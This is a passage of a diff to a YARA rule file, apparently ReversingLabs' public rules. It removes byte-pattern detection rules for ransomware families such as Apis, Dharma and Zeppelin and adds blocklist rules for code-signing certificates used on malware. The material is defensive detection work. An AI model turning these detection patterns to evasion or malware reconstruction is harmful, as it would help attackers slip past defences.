?? 50 56 89 75 ?? C7 06 ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? E8 - ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C6 - } - $find_system_volumes_v2_p2 = { - 45 ?? ?? 8B 45 ?? 89 46 ?? C6 45 ?? ?? 83 05 ?? ?? ?? ?? ?? EB ?? 50 56 B9 ?? ?? ?? - ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 4D ?? 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ?? - 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? - ?? ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 33 C0 8B 75 ?? 83 C3 ?? FF 45 ?? 2B CE - 66 89 45 ?? B8 ?? ?? ?? ?? F7 E9 C7 45 ?? ?? ?? ?? ?? C1 FA ?? 8B C2 C7 45 ?? ?? ?? - ?? ?? C1 E8 ?? 03 C2 39 45 ?? 0F 82 ?? ?? ?? ?? 83 E7 ?? 89 7D ?? C7 45 ?? ?? ?? ?? - ?? 8D 4D ?? E8 ?? ?? ?? ?? 5F 5B EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 68 ?? - ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 6A ?? C7 45 ?? ?? - ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? F3 - 0F 7E 05 ?? ?? ?? ?? 8B F0 2B 75 ?? 66 0F D6 45 ?? 90 8B 55 ?? 8B 4D ?? E8 ?? ?? ?? - ?? 83 3D ?? ?? ?? ?? ?? F2 0F 10 0D ?? ?? ?? ?? F2 0F 59 C1 F2 0F 59 C1 F2 0F 59 C1 - F2 0F 11 45 ?? 74 ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 3B C8 74 ?? 6A ?? 51 FF 35 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 0F 57 C0 66 0F 13 05 ?? ?? ?? ?? FF 35 - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? F2 0F 10 45 ?? 83 EC ?? F2 0F 11 44 24 ?? 66 0F 6E C6 - F3 0F E6 C0 C1 EE - } - condition: - uint16(0)==0x5A4D and ((($find_files) and ($encrypt_files_v1) and ($cmd_prompt) and ($exclude_from_encryption_v1)) or (($find_files) and ($cmd_prompt) and ($ldap_connect) and ($encrypt_files_v2) and ($exclude_from_encryption_v1)) or (($find_files) and ($cmd_prompt) and ($ldap_connect) and ($encrypt_files_v3) and ($exclude_from_encryption_v1)) or (($find_files) and ($encrypt_files_v4) and ($drop_ransom_note_v1) and ( all of ($exclude_from_encryption_v2_p*))) or (($find_files) and ($exclude_from_encryption_v1) and ( any of ($encrypt_files_v5)) and ( all of ($find_system_volumes_v2_p*))) or (( all of ($encrypt_files_v5_p*)) and ( all of ($set_default_icon_p*)) and ($find_system_volumes) and ( all of ($drop_ransom_note_v2_p*)) and ($find_files)) or (( all of ($encrypt_files_v6_p*)) and ( all of ($set_default_icon_p*)) and ( all of ($drop_ransom_note_v2_p*)) and ($find_files))) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="2a:6b:2d:f2:10:be:14:f4:e1:8e:10:c7" and 1472095404<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Apis : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_412Ab2A50E8028Ddcbc499Ddf45F2045 : INFO FILE { meta: - description = "Yara rule that detects Apis ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "63791250-e21e-53d1-932c-9b5d16a7cad9" - date = "2021-11-25" - modified = "2021-11-25" + id = "aabb3a66-5677-5359-9d81-92c8d4c7d910" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.Apis.yara#L1-L75" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0915469884a268f124da348d6a182eb4a0f69063d4041b46628794ab011227ef" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14566-L14582" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a5b85d13dee51d68af28394ecee3dcc2efe7add4d26c2a8033d1855b33ac6271" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Apis" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 0A 06 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? - 28 ?? ?? ?? ?? 2C ?? 06 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E - 69 32 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 7E ?? ?? ?? ?? - 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? - ?? ?? 28 ?? ?? ?? ?? 0D 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 - ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E - ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? - ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? - 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? - 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? - ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? - ?? 13 ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 07 28 ?? ?? - ?? ?? 08 28 ?? ?? ?? ?? 09 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 - ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? - 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 2A - } - $encrypt_files = { - 02 28 ?? ?? ?? ?? 0A 17 0B 16 0C 38 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 06 08 9A 28 - ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 08 9A 28 ?? ?? ?? ?? 0D 7E ?? ?? ?? ?? 11 ?? FE 06 ?? ?? - ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 09 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 - ?? ?? ?? ?? 06 08 9A 73 ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 6F - ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 2F ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? - 18 5B 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 06 08 9A 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? - 06 08 9A 06 08 9A 72 ?? ?? ?? ?? 1A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2B ?? - 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 1A 5B 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? - 13 ?? 06 08 9A 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 06 08 9A 06 08 9A 72 ?? ?? ?? ?? 1A - 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 07 2C ?? 16 0B 02 72 ?? ?? ?? ?? 7E ?? ?? - ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 08 17 58 0C 08 06 8E - 69 3F ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 28 ?? ?? ?? ?? - 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 26 DE ?? 2A - } - $setup_env = { - 28 ?? ?? ?? ?? 2C ?? 17 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? - ?? 2C ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? - ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 2B ?? 7E ?? ?? ?? ?? 2C ?? - 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? - 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2D ?? 14 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? - 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 7E ?? - ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2A - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Ding Ruan" and pe.signatures[i].serial=="41:2a:b2:a5:0e:80:28:dd:cb:c4:99:dd:f4:5f:20:45" and 1479340800<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_0747F6A8C3542F954B113Fd98C7607Cf : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "de5fbb40-7d41-5f3e-97c9-a6882c19ebb5" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14584-L14600" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "9d5e5c98f3ef372532cfc4f544d5d3f620dc2e49d8b6e1c96df29d2a38042019" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($setup_env) and ($find_files) and ($encrypt_files) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="07:47:f6:a8:c3:54:2f:95:4b:11:3f:d9:8c:76:07:cf" and 1474329600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Dharma : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_2572B484Fa0A61Be7288D785D7Bda7D3 : INFO FILE { meta: - description = "Yara rule that detects Dharma ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8157b20b-717c-581f-83c1-5fc8d2312238" - date = "2020-07-15" - modified = "2020-07-15" + id = "b1d71baa-9100-512d-91f4-7286a740e5f2" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Dharma.yara#L1-L108" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6f33281523b462aaff68bb04f2f6869c3e6cd60cd9306ed80bb0c3e3b699f315" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14602-L14618" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d6b23ba706a640a1e76ad7ab0a70c845c9366ac8355eea5439f76f6993c9c6be" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Dharma" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $file_search = { - 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? - 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 4D ?? 51 8B 55 - ?? 52 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? - 75 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? 81 7D ?? ?? ?? ?? ?? 76 ?? 8B - 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B - 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D - ?? ?? 75 ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 - 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? - 89 45 ?? 8B 45 ?? 8B E5 5D C3 - } - $file_encrypt_1 = { - 55 8B EC 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? 8B 45 ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? 89 4D ?? C7 45 - ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? - ?? 83 C4 ?? 8B 45 ?? 33 D2 B9 ?? ?? ?? ?? F7 F1 8B 45 ?? 2B C2 83 E8 ?? 89 45 ?? 8B - 4D ?? 51 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? - ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 05 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 83 ?? ?? - ?? ?? 8B 4D ?? 83 E1 ?? 74 ?? 8B 55 ?? 83 E2 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 6A ?? - 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? - ?? 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 89 55 ?? 8B 45 ?? 89 85 ?? ?? ?? - ?? 8B 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D - ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? - 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 - ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 4D ?? 51 - E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? - ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8B 4D - ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B - 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 83 7D - ?? ?? 75 ?? 8B 4D ?? 3B 4D ?? 73 ?? 8B 45 ?? 33 D2 B9 ?? ?? ?? ?? F7 F1 B8 ?? ?? ?? - ?? 2B C2 89 45 ?? 8B 4D ?? 03 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 - E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 03 45 ?? 50 8B 4D ?? 51 - } - $file_encrypt_2 = { - 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 03 45 ?? 39 85 ?? ?? ?? ?? - 74 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? - 83 C4 ?? 8B 95 ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? - ?? 83 7D ?? ?? 74 ?? 8B 8D ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 8B 55 ?? 52 8B 45 ?? 50 - 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 03 55 ?? 89 55 ?? 8B 45 ?? 03 45 ?? 89 - 45 ?? 6A ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0 ?? 89 45 - ?? 6A ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0 ?? 89 45 ?? - 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0 ?? 89 - 45 ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0 ?? 89 45 - ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 05 ?? ?? - ?? ?? 89 45 ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 83 C0 - ?? 89 45 ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 2B 55 ?? 52 8B 45 ?? 50 8B 8D ?? ?? - ?? ?? 51 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 55 ?? 2B 55 ?? 39 95 ?? ?? ?? ?? 74 ?? EB ?? - EB ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? E9 ?? - ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7E ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 8D ?? ?? - ?? ?? 51 8B 95 ?? ?? ?? ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? - 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7E ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? - ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? - ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 8B E5 5D C3 - } - $enum_shares = { - 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 - ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 45 ?? - 50 8B 4D ?? 51 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 E8 ?? - ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 - ?? 8B 4D ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 83 7C 10 ?? ?? 75 - ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 50 8B 55 ?? 52 8B 45 ?? C1 E0 ?? 8B 4D ?? 8B 54 01 ?? - 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 6A ?? 8B 45 ?? 50 8B 4D ?? C1 E1 ?? 8B 55 ?? - 8B 44 0A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8B 4D ?? 51 8B 55 ?? C1 E2 ?? 8B 45 ?? - 8B 4C 10 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 83 E1 - ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? C1 E1 ?? 03 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 - ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? - 52 E8 ?? ?? ?? ?? 8D 45 ?? 50 8B 4D ?? 51 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F - 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 8D - 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB - ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 8B 55 ?? C1 E2 ?? - 8B 45 ?? 83 7C 10 ?? ?? 75 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 50 8B 55 ?? 52 8B 45 ?? C1 - E0 ?? 8B 4D ?? 8B 54 01 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 6A ?? 8B 45 ?? 50 - 8B 4D ?? C1 E1 ?? 8B 55 ?? 8B 44 0A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8B 4D ?? 51 - 8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C1 E2 ?? - 8B 45 ?? 8B 4C 10 ?? 83 E1 ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? C1 E1 ?? 03 4D - ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? E9 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B E5 5D C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SILVA, OOO" and pe.signatures[i].serial=="25:72:b4:84:fa:0a:61:be:72:88:d7:85:d7:bd:a7:d3" and 1495152000<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_6726Bd04204746C46857887F : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "ef882d82-f535-57c3-9d45-8d47ecc7f607" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14620-L14636" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "11d25dff7e05e6f97725e919cc6c978d7f2e64a91cf04b72461c71d592dfc2dc" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and $file_search and $enum_shares and $file_encrypt_1 and $file_encrypt_2 + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="67:26:bd:04:20:47:46:c4:68:57:88:7f" and 1474352405<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Zeppelin : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_4463D8B31E0F87C14233D4D0D2C487A0 : INFO FILE { meta: - description = "Yara rule that detects Zeppelin ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f5cf514d-4dd0-58b7-82d0-5cb516a139a3" - date = "2020-07-15" - modified = "2020-07-15" + id = "eefd6fa2-7ed7-51d0-bddd-90f0727a93cc" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Zeppelin.yara#L1-L109" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8fb07e49d2ff9d497fb36a5d901748315ae519f5ef845d1a5ec6341d0eb1f68c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14638-L14654" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "04ce664fceb4a617294e860d5364d8a4ce8e055fd2baebb8be69f258d9c70ac7" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = 